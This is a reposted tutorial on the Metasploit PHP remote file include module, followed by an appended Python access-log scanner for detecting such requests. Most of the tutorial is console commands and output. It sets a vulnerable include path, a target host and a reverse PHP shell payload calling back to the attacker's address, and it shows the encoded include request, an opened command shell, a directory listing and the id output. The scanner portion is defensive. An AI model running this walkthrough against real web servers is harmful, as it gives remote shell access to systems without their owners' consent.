Using the Metasploit PHP Remote File Include Module
Published: 2019-05-10


Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from an RFI vulnerability.

It is not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set your PHPURI to the vulnerable path, putting XXpathXX where you would normally put your PHP shell. So we take something that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI:

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

Let's see it in action:
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

   Name                     Rank       Description
   ----                     ----       -----------
   unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

       Name: PHP Remote File Include Generic Exploit
    Version: 8762
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  hdm
  egypt

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting                                              Required  Description
  ----        ---------------                                              --------  -----------
  PATH        /                                                            yes       The base directory to prepend to the URL to try
  PHPRFIDB    /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
  PHPURI                                                                   no        The URI to request, with the include parameter changed to XXpathXX
  Proxies                                                                  no        Use a proxy chain
  RHOST                                                                    yes       The target address
  RPORT       80                                                           yes       The target port
  SRVHOST     0.0.0.0                                                      yes       The local host to listen on.
  SRVPORT     8080                                                         yes       The local port to listen on.
  SSL         false                                                        no        Negotiate SSL for incoming connections
  SSLVersion  SSL3                                                         no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                                                                  no        The URI to use for this exploit (default is random)
  VHOST                                                                    no        HTTP server virtual host

Payload information:
  Space: 32768

Description:
  This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg          header.inc.php  license.txt     slog_users.txt      version.txt
1.jpeg          index.asp       old             slogin.inc.php
adminlog.php    install.txt     readme.txt      slogin_genpass.php
footer.inc.php  launch.asp      slog_users.php  slogin_lib.inc.php

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
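The defender's view of the request sent in the session above, as an added example that is not part of the original post or of Metasploit: a small Python scanner for web-server access logs that percent-decodes every query parameter and flags values that resolve to a remote URL, noting when the value was percent-encoded byte for byte as in the module's request. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed combined log format: client ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)  # value resolves to a remote URL
PCT_ONLY_RE = re.compile(r'^(?:%[0-9A-Fa-f]{2})+$')       # every byte percent-encoded

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in the clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    m = REQUEST_RE.match(line)
    if not m or "?" not in m["target"]:
        return []
    path, _, query = m["target"].partition("?")
    findings = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        decoded = decode_fully(raw)
        if REMOTE_RE.match(decoded):
            findings.append({
                "client": m["ip"], "path": path, "param": name,
                "url": decoded, "status": m["status"],
                # Browsers do not encode letters and digits; a fully encoded URL is a strong signal.
                "fully_encoded": bool(PCT_ONLY_RE.match(raw)),
            })
    return findings

def scan(lines):
    return [f for line in lines for f in scan_line(line)]

# Constructed sample log lines; the first mirrors the request shown in the session above.
SAMPLE_LOG = [
    '192.168.6.140 - - [09/May/2010:21:37:26 -0400] "GET /1/slogin_lib.inc.php?slogin_path='
    '%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30%38%30%2f%52%76%53%49%71%68%64%66%74%3f HTTP/1.1" 200 512',
    '192.168.6.20 - - [09/May/2010:21:40:02 -0400] "GET /1/slogin_lib.inc.php?slogin_path=lib/ HTTP/1.1" 200 1843',
    '192.168.6.21 - - [09/May/2010:21:41:10 -0400] "GET /1/slogin_lib.inc.php?slogin_path=http%253A%252F%252Fexample.test%252Fs.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also match, so treat a hit as a lead to correlate with the path and response status rather than as a verdict.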

 

Reposted from: http://raqmb.baihongyu.com/
